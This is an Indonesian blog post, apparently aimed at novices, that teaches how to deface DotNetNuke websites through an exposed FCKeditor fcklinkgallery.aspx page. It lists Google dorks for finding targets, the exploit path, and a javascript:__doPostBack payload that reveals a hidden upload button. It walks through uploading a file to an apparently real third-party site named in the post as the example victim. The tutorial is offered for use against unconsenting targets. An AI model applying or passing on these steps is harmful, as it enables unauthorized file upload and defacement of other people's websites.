Tutorial Deface Dengan DNN | Newbie Only

Kali ini saya akan share teknik deface dengan Dot Net Nuke atau biasa disebut DNN. Teknik ini sangat mudah sehingga cocok untuk pembelajaran bagi pemula. Untuk yang udah master lebih baik merem dulu. :v
Oke, langsung saja.

Google Dork :

  • inurl:”/portals/0″
  • inurl:fcklinkgallery.aspx

Dork lain silahkan dikembangkan sendiri.

    Exploit : Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
    Pertama, cari target di google dengan dork di atas. Nyarinya harus sabar. Dan ternyata alamat yang kita temukan adalah http://www.caslpo.com/Portals/0/kotek.xml
    Kedua, masukkan exploitnya dimulai dari portals/0/ . Sehingga menjadi http://www.caslpo.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
    Nanti akan menjadi seperti ini :

    Lalu pilih file. Hapus url di address bar dan ganti dengan script berikut javascript:__doPostBack(‘ctlURL$cmdUpload’,”)

    Maka akan muncul tombol upload. Klik tombol tersebut. Pilih file yang akan diupload. Sebagai contoh, saya upload file dengan nama jkt.txt . Lalu pilih Upload Selected File .

    Tunggu proses upload selesai. Dan letak hasil deface kalian ada di http://situs/portals/0/namafile

    Sehinga hasil deface saya terletak di :
    http://www.caslpo.com/portals/0/jkt.txt

    Bagaimana ? Mudah kan ? Jika ada yang kurang jelas, silahkan bertanya di kotak komentar.

    • NB : Ekstensi file yang bisa di upload adalah : swf, jpg, jpeg, JPE, gif, bmp, png, doc, xls, ppt, pdf, txt, xml, xsl, css, zip, 3gp, asf, asx, avi, flv, m4v, mov, mp4, mpe, mpeg, mpg, ram, rm, rmvb, wm, wmv, vob . Kalian tidak bisa upload shell php !
    Shares
    Tags:

    22 Comments

    Leave a Reply